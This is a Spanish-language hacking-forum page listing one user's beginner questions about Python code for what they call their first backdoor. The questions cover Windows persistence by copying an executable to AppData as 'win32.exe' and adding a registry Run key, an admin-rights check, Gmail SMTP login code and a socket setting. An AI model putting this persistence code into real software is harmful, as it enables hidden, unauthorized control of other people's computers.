elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 [8] 9
71  Programación / Scripting / Re: traducir este metodo de python3 en: 30 Noviembre 2019, 08:13 am
Jajajajaja see, es mio, solo que como me documento de varias partes a veces fallo en la parte teorica como el porque de las cosas.

Es mi primera backdoor, espero seguir siendo cada vez mejor, claro que no para mal, me gustan los whitehat.

Me documentare mas sobre el appdata y este lio de carpetas.

Lo que te queria decir era que hay un path

Path = blablabla\app.exe

Y si luego yo verifico y veo que no existe, copia el exe que uso a ese path

Tal que quedaria

Path = blablabla\app.exe\app.exe

Pero al parecer esto no pasa porque cuando verifico este solo esta 1 vez y no 2.

Eres experto en seguridad informatica?

Algun consejo, documentacion, pdf o algo que me quieras brindar, la verdad lo valoraria muchisimo.

He visto que eres el que me contesta las dudas, sigue asi bro.

Mis preguntas las leen 10.000 personas y solo las respondes tu.

Quiza para ti sea sencillo esto, pero creeme que el conocimiento que das es de mucho agrado, y creeme que por mi parte y creo que muchos agradecen.

Sin mas que decir, gracias por su tiempo y que tenga un excelente dia.
72  Programación / Scripting / Re: Duda con el metodo setsockopt de subprocess pyhton3 en: 30 Noviembre 2019, 08:01 am
Entendi eso de que dos programas ( o mas ??) usen el mismo address (ip,puerto ???), sol_socket no mucho xd, y ese 1 del final no me dijiste para que era.

Por otra parte, tienes toda la razon, he estudiado python, principios de hacking etico, un poco de bash, y si, redes tambien las debo ver, pero voy poco a poco, sabras mas que yo que esta materia requiere de muchas cosas, voy paso por paso, pero si empezare a ver redes.

Entonces por favor te pido el favor de que me aclares ese uno que va al final, y el sol_socket que no lo entendi muy bien ( pebse que significaba "solo sockets" ).

Sin mas que decir, muchas gracias y que tengas buen dia.
73  Programación / Scripting / Duda con el modulo os de python3 en: 30 Noviembre 2019, 05:15 am
def root_check(self):
      try:
         check = os.listdir(os.sep.join([os.environ.get("SystemRoot",r'C:\windows'),'temp']))
         #check = os.listdir(r"C:\Windows\Temp")
      except:
         self.admin = "\nNo eres usuario root."
      else:
         self.admin = "\nEres usuario root."

La parte que esta comentada la hice yo, porque no entiendo muy bien lo que esta a la derecha del igual de check, es decir. Desde os.listdir hasta Temp.

os.listdir lista el directorio, tal cual como hacer un dir.

pero desde os.sep.join empieza lo desconocido.

Agradeceria que me dieran sus conocimientos respecto a esta duda, y como ingrediente final, me guataria saber porque se usa os.sep.join y no os.path.join?.

sin mas que decir, muchas gracias y que tengan un excelente dia.
74  Programación / Scripting / Duda con el modulo email de python3 en: 30 Noviembre 2019, 05:08 am
def send_email(self,cliente):

      server = smtplib.SMTP("smtp.gmail.com",587) # 465/ssl; 587/tls(statrtls) --smtp
      server.ehlo()
      server.starttls()
      server.ehlo()
      server.login(cliente.email_in,cliente.password)

tengo una duda con el metodo .ehlo()?

Alguien sabe para que sirve dicho metodo?

Me documente, pero como siempre es bueno escuchar a varias personas para tener mejor idea del tema.

Espero pronta respuesta, muchas gracias.
75  Programación / Scripting / Duda con el metodo setsockopt de subprocess pyhton3 en: 30 Noviembre 2019, 05:05 am
self.server.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)

Alguien sabe para que sirve este metodo, y que significan esos atributos internos?
(SOL_SOCKET,SO_REUSEADDR, y el 1)
76  Programación / Scripting / Re: traducir este metodo de python3 en: 30 Noviembre 2019, 05:03 am
Es correcto, pero para que agrega ese exe a appdata, es esto necesario para registrar el exe al regedit?

Ademas la ubicacion tiene la ruta de appdata mas el exe, por lo que luego hacer un shutil.copyfile(exe,path), la ruta ahora no vendria siendo (al final) el exe que ya estaba escrito mas el exe que ahora estoy copiando?, algo asi como name.exe\name.exe?
77  Programación / Scripting / Re: ¿Para que sirve el modulo re y requests de python? en: 30 Noviembre 2019, 05:01 am
Entendi perfectamente, en pocas palabras entonces el modulo re es para realizar busquedas avanzadas en cadenas de texto o strings?
78  Programación / Scripting / ¿Para que sirve el modulo re y requests de python? en: 30 Noviembre 2019, 04:22 am
Es una duda que tengo sobre el modulo re y el modulo requests, para que sirven, ya me documente en linea, pero sigo sin entender algunas cosas, por lo que seria de gran ayuda recibir mas información de ello para así poder complementarme mejor y tener una mejor idea de esto.

sin mas que decir, muchas gracias.
79  Programación / Scripting / traducir este metodo de python3 en: 30 Noviembre 2019, 03:13 am
def persistencia(self):
      location = os.environ["appdata"] + r'\win32.exe'
      if not os.path.exists(location):
         shutil.copyfile(sys.executable,location)
         subprocess.call(r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v win32 /t REG_SZ /d {}'.format(location),shell = True)

Alguien me puede traducir en español jaja, el siguiente metodo de python3?

Lo que entiendo es que generamos una ubicacion para luego comprobar si esta existe, en caso de no existir, se copia el ejecutable actual (el que uso en ese momento, en este caso python) a esa ubicacion, una vez hecho eso se pasa la ruta a regedit para que este exe se ejecute de por vida una vez la pc se encienda.

La duda es lo que va a la derecha del igual de location, eso de AppData y eso, no le veo el sentido, como tampoco le veo sentido a agragarle a la ubicacion el exe,sabiendo que el exe ya esta en la ubicacion osea quedaria algo como win32.exe\win32.exe, o me equivoco?

espero pronta ayuda caballeros, muchas gracias.

pdta: appdata y sus subcarpetas para que son? (soy nuevo en windows xd)
80  Programación / Scripting / Re: Duda con encoding y el modulo base64 en python3 en: 30 Noviembre 2019, 02:22 am
Muchas gracias !
Páginas: 1 2 3 4 5 6 7 [8] 9
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines